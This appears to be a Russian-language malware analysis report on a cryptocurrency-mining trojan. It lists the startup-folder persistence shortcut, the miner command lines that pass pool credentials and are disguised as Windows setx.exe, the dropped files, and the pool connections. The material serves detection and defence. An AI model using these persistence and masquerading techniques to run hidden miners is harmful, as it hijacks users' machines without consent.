Техническая информация (символы «#» в именах узлов и учётных данных — маска, скрывающая часть значения)
- Автозапуск — ярлык в папке автозагрузки: %HOMEPATH%\Start Menu\Programs\Startup\Runme.vbs.lnk
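- Командные строки запускаемых процессов (setx.exe стартует из %APPDATA%, а не из системного каталога, хотя его имя совпадает с системной утилитой Windows; адрес пула и учётные данные передаются в параметре -o):
- '%APPDATA%\setx.exe' -o http://Ze############ade:1231@eu1.triplemining.com:8344 -g no -t 2 -T 45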
- '%APPDATA%\setx.exe' -o http://ra##############k.com:btcarecoffee50@pool.50btc.com:8332 -g yes -t 2 -T 45
- '<SYSTEM32>\wscript.exe' "%APPDATA%\Runme.vbs"
- %APPDATA%\btc.il
- %APPDATA%\coinutil.dll
- %APPDATA%\setx.exe
- %APPDATA%\phatk.cl
- %APPDATA%\usft_ext.dll
- %APPDATA%\miner.dll
- %APPDATA%\phatk.ptx
- %APPDATA%\Runme.vbs
- Сетевая активность — подключения (узел:порт) и DNS-запросы:
- 'eu#.###plemining.com':8344
- 'po##.50btc.com':8332
- DNS ASK eu#.###plemining.com
- DNS ASK po##.50btc.com
- ClassName: 'Shell_TrayWnd' WindowName: ''
- ClassName: 'EDIT' WindowName: ''